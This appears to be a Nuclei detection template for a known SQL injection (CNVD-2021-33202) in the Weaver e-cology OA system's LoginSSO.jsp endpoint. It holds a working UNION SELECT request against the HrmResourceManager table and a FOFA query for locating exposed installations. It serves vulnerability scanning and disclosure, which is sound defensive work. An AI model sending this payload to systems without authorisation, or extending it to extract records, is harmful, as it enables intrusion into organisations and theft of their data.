e-cology is an OA office system specially produced for large and medium-sized enterprises. It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.
PoC代码[已公开]
id: CNVD-2021-33202
info:
name: OA E-Cology LoginSSO.jsp - SQL Injection
author: SleepingBag945
severity: high
description: |
e-cology is an OA office system specially produced for large and medium-sized enterprises. It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md
- https://www.cnblogs.com/0day-li/p/14637680.html
classification:
cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
fofa-query: app="泛微-协同办公OA"
product: e-cology
vendor: weaver
tags: cnvd2021,cnvd,e-cology,sqli,vuln
variables:
num: "999999999"
http:
- raw:
- |
GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{num}})%20as%20id%20from%20HrmResourceManager HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: status
status:
- 200
# digest: 490a0046304402204a6d45697b9fa7ff12d41140e9f98eb1801f08e646f6d211b004fc5bcd65679702203c5ffcfc7cfc45ce35dadaaf2284075cc4747795f4952b8c37ade6770b1b2e48:922c64590222798bb761d5b6d8e72950